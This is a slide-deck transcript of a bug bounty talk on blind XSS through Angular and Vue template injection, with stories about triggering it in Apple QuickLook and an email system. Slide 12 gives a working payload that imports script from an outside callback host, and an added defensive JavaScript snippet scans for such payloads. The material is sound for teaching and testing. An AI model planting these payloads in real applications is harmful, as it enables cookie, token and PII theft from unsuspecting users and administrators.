
Getting Blindly Lucky

JR0ch17
November 01, 2020


Transcript

  1. Getting Blindly Lucky: Interesting Blind XSS Stories

  2. {{ whoami }} Jasmin Landry, JR0ch17, part-time bug bounty hunter
  3. {{ agenda }} • What is XSS? • Angular & Vue • Blind XSS Stories • Questions/Comments
  4. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/
  5. {{ XSS PoCs }} • Typical PoCs • Steal CSRF tokens • Steal cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (i.e. PII) • SSRF if found in an HTML-to-PDF converter
  6. {{ Angular }} MVC client-side framework built by Google • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/
  7. {{ Vue }} “Progressive” MVVM client-side framework for building UIs and SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/
  8. {{ Angular vs Vue }} https://www.wappalyzer.com/compare/angular-vs-vue-js/

  9. {{ Blind XSS }} Variant of a Stored XSS. The payload is saved and executed in a separate part of the application (i.e. admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator
  10. {{ XSSHunter Payloads }}

  11. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS payloads from HackerOne’s Hacktivity are from an HTML context (i.e. <script> tag). Not a single one from template injection.
  12. {{ Angular & Vue Blind XSS Payload }} {{ constructor.constructor('import("https://jr0ch17.xss.ht")') () }}
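An added example (not from the talk) showing the defensive side of the {{7*7}} and constructor.constructor slides: HTML escaping alone does not stop Angular/Vue interpolation, user text inside a compiled region needs ng-non-bindable (AngularJS) or v-pre (Vue), and stored records can be scanned for interpolation syntax before they reach an admin panel or email template. The sample records and the callback host are constructed placeholders.

```javascript
// Added example, not from the talk: HTML escaping alone does not stop
// Angular/Vue template injection, so user text rendered inside a compiled
// region needs ng-non-bindable (AngularJS) or v-pre (Vue), and stored
// data can be scanned for interpolation syntax before it reaches an
// admin panel or an email template.

// Standard HTML escaping. '{' and '}' are not HTML metacharacters, so
// "{{7*7}}" comes out unchanged and the framework still evaluates it
// once the browser has turned the markup into a text node.
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Anything between {{ and }} is what the interpolation parser would evaluate.
const INTERPOLATION_RE = /\{\{[\s\S]*?\}\}/;

function looksLikeTemplateInjection(s) {
  return INTERPOLATION_RE.test(String(s));
}

// Wrap user-controlled text so the framework skips interpolation for that
// subtree; escaping still covers the classic HTML-context XSS.
function renderUserText(text, framework) {
  const attr = { angularjs: 'ng-non-bindable', vue: 'v-pre' }[framework];
  if (!attr) throw new Error(`unsupported framework: ${framework}`);
  return `<span ${attr}>${htmlEscape(text)}</span>`;
}

// Constructed sample of stored records, as a back-office view might load them.
// The placeholder host stands in for an XSSHunter-style callback domain.
const SAMPLE_RECORDS = [
  { id: 1, body: 'Hello, my order never arrived.' },
  { id: 2, body: 'Thanks <b>a lot</b>!' },
  { id: 3, body: '{{7*7}}' },
  { id: 4, body: "{{ constructor.constructor('import(\"https://callback.example\")')() }}" },
];

// Ids of records whose body contains interpolation syntax.
function flagTemplateInjection(records) {
  return records
    .filter((r) => looksLikeTemplateInjection(r.body))
    .map((r) => r.id);
}

console.log(htmlEscape('{{7*7}}'));                 // {{7*7}}
console.log(renderUserText('{{7*7}}', 'vue'));      // <span v-pre>{{7*7}}</span>
console.log(flagTemplateInjection(SAMPLE_RECORDS)); // [ 3, 4 ]
```

Record 2 shows why escaping is still needed for the HTML context; records 3 and 4 show the input that escaping leaves untouched and that the scan catches.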

  13. {{ Blind XSS Stories }}

  14. {{ Blind XSS Story #1 }} A Google search led to Apple’s QuickLook feature. QuickLook is a way to preview a file to view its contents instead of having to open the file.
  15. {{ Blind XSS Story #1 }} When an XSS triggers with XSSHunter, it captures the DOM...
  16. {{ Blind XSS Story #1 }}

  17. {{ Blind XSS Story #1 }} Turns out the CSV file contained a LOT of PII...
  18. {{ Blind XSS Story #2 }} Again, I look at the DOM.....
  19. {{ Blind XSS Story #2 }} Someone had filed a complaint on my user!!! The complaint was forwarded as an email. The XSS triggered in the email system!
  20. {{ Thank You }} Questions or comments: @JR0ch17 https://linkedin.com/in/jasminlandry